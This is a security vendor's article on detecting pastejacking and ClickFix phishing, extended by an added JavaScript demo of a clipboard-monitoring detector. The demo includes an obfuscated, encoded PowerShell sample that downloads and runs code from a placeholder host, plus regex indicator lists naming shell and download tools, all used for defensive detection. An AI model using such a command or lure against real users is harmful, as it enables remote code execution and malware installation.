Detection of Pastejacking Social Engineering Tactics



As social engineering tactics become more sophisticated, threat actors are increasingly leveraging user-driven execution models. Palo Alto Networks has implemented detection capabilities for Pastejacking phishing attacks, a category of threats that weaponize the user’s clipboard to bypass traditional security perimeters.


Understanding Pastejacking

Pastejacking is a technique in which a malicious website hijacks a user's clipboard. When a user interacts with a page, such as by clicking a "Verify you are human" button or a fake "Fix It" prompt, malicious JavaScript replaces the clipboard content with a harmful command.

ClickFix is a specific campaign strategy that utilizes this technique. It masquerades as a technical support prompt, instructing the user to "fix" a common computer issue (such as a missing driver or a browser error) by pressing Win+R, pasting the command (Ctrl+V), and hitting Enter. Because the command is executed manually through a trusted system shell such as PowerShell, it bypasses static analysis tools designed to detect malicious web pages, as these tools typically do not analyze the user's clipboard.


Targeted Industries and Trends

ClickFix has become an increasingly popular technique in 2025. These campaigns leverage the reputation of legitimate products and services to mask malicious activity. Based on recent observations, these attacks impact a broad spectrum of global industries, including:

  • High Technology
  • Financial Services
  • Manufacturing & Utilities
  • Wholesale and Retail
  • State and Local Government
  • Professional and Legal Services

The rise of these tactics marks a significant shift toward lures that require manual user interaction to succeed.


Pastejacking Attack Examples

NetSupport RAT: Attackers utilize fake landing pages for services such as DocuSign or Okta. A "security verification" prompt instructs the user to execute a command, which sideloads a malicious DLL (msvcp140.dll) to eventually deploy the NetSupport Remote Access Trojan.


Detection via Advanced URL Filtering

Palo Alto Networks Advanced URL Filtering (AURL) has introduced a specialized Pastejacking Detection Engine designed to identify and block these hidden clipboard injection attacks. Static analyzers often fail here for two reasons: they do not inspect what a page writes to the clipboard, and the malicious payload is only revealed after manual user interaction. Our solution addresses these gaps through several key technical pillars:

  • Dynamic Data Flow Analysis: The process begins by monitoring the system clipboard and input streams. The engine traces data flow to isolate hidden or obfuscated payloads the moment they are injected into the system.
  • Dynamic Deobfuscation: Once a suspicious payload is captured, it is passed to our patented Deobfuscation engine. This layer neutralizes evasion tactics and strips away the obfuscation to expose the raw, underlying code.
  • Deep Learning Analysis: This exposed content is immediately analyzed by our Deep Learning model to precisely detect malicious intent and block the attack.
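To make the mechanism concrete, here is an added example that is not Palo Alto Networks or AURL code: a toy version of the three-layer pipeline just described, applied to the clipboard-hijack behaviour covered in "Understanding Pastejacking" above. Layer 1 hooks the two write paths a page can use to plant clipboard text (`navigator.clipboard.writeText` and `DataTransfer.prototype.setData`, the object behind `event.clipboardData` in a `copy` handler); layer 2 undoes common obfuscation (PowerShell `-EncodedCommand` base64, backtick escapes, string concatenation); layer 3 is a hand-written indicator scorer standing in for the deep learning model. The browser objects, the indicator list and threshold, the `.invalid` URLs and both sample clipboard strings are constructed for the example and run under Node.

```javascript
// Added example (not Palo Alto Networks or AURL code). The regexes below are
// illustrative indicator lists, not the product's detection logic.

const SHELL_LAUNCHER = /\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)(\.exe)?\b/i;
const DOWNLOAD_EXEC = /\b(iwr|invoke-webrequest|invoke-expression|iex|downloadstring|start-process|curl|wget)\b/i;
const STEALTH_FLAGS = /-(w(indowstyle)?\s+h(idden)?|nop(rofile)?|(ep|executionpolicy)\s+bypass)\b/i;
const ENCODED_CMD = /-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})/i;
const REMOTE_URL = /\bhttps?:\/\/\S+/i;

// Layer 2: strip the obfuscation that static scanners trip over.
function deobfuscate(text) {
  let out = String(text);
  // PowerShell -EncodedCommand carries base64 of a UTF-16LE string; decode it in place.
  out = out.replace(ENCODED_CMD, (whole, flag, b64) =>
    `-${flag} ${Buffer.from(b64, 'base64').toString('utf16le')}`);
  // Remove PowerShell backtick escapes (p`o`w`e`r`s`h`e`l`l -> powershell).
  out = out.replace(/`/g, '');
  // Collapse string concatenation ('po'+'wer'+'shell' -> 'powershell') until stable.
  let prev;
  do {
    prev = out;
    out = out.replace(/(["'])([^"']*)\1\s*\+\s*\1([^"']*)\1/g, '$1$2$3$1');
  } while (out !== prev);
  return out.replace(/\s+/g, ' ').trim();
}

// Layer 3: a transparent heuristic stand-in for the ML classifier. Each
// independent indicator scores one point; two or more -> malicious.
function classify(rawClipboardText) {
  const raw = String(rawClipboardText);
  const normalized = deobfuscate(raw);
  const indicators = [];
  if (SHELL_LAUNCHER.test(normalized)) indicators.push('shell-launcher');
  if (DOWNLOAD_EXEC.test(normalized)) indicators.push('download-or-execute');
  if (STEALTH_FLAGS.test(normalized)) indicators.push('stealth-flags');
  if (REMOTE_URL.test(normalized)) indicators.push('remote-url');
  if (ENCODED_CMD.test(raw)) indicators.push('encoded-command');
  return { verdict: indicators.length >= 2 ? 'malicious' : 'benign', indicators, normalized };
}

// Layer 1: hook the clipboard write paths. In an instrumented browser the
// arguments would be window.navigator.clipboard and DataTransfer.prototype;
// they are passed in so the same code runs against stand-ins under Node.
function installClipboardMonitor(clipboard, dataTransferProto) {
  const captured = [];
  const record = (api, text) => {
    const event = { api, text: String(text), ...classify(text) };
    captured.push(event);
    return event;
  };
  const origWriteText = clipboard.writeText.bind(clipboard);
  clipboard.writeText = (text) => {
    record('clipboard.writeText', text);
    return origWriteText(text);
  };
  const origSetData = dataTransferProto.setData;
  dataTransferProto.setData = function (format, data) {
    if (/^text/i.test(format)) record('clipboardData.setData', data);
    return origSetData.call(this, format, data);
  };
  return captured; // live array: every clipboard write appears here with its verdict
}

// Constructed stand-ins and sample clipboard writes (not from a real campaign).
function demo() {
  const fakeClipboard = { writeText: async () => undefined };
  function FakeDataTransfer() { this.items = {}; }
  FakeDataTransfer.prototype.setData = function (format, data) { this.items[format] = data; };
  const captured = installClipboardMonitor(fakeClipboard, FakeDataTransfer.prototype);

  // A ClickFix-style string as a page might plant it behind a "Verify you are human" click.
  const encoded = Buffer.from('iwr http://placeholder.invalid/x | iex', 'utf16le').toString('base64');
  fakeClipboard.writeText('p`o`w`e`r`s`h`e`l`l -w hidden -enc ' + encoded);
  // A benign copy (a documentation link) via the legacy copy-handler path.
  new FakeDataTransfer().setData('text/plain', 'https://docs.example.invalid/install');
  return captured;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The point of hooking the write APIs rather than scanning page source is the one the article makes: the payload only exists once the page's click handler runs, so it has to be captured from the data flow and normalized before any classifier, heuristic or learned, can see the real command.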

Additional Information

For more information, refer to the Unit 42 Research Blog.

For a comprehensive understanding of URL Filtering Category Best Practices, please refer to the provided documentation.
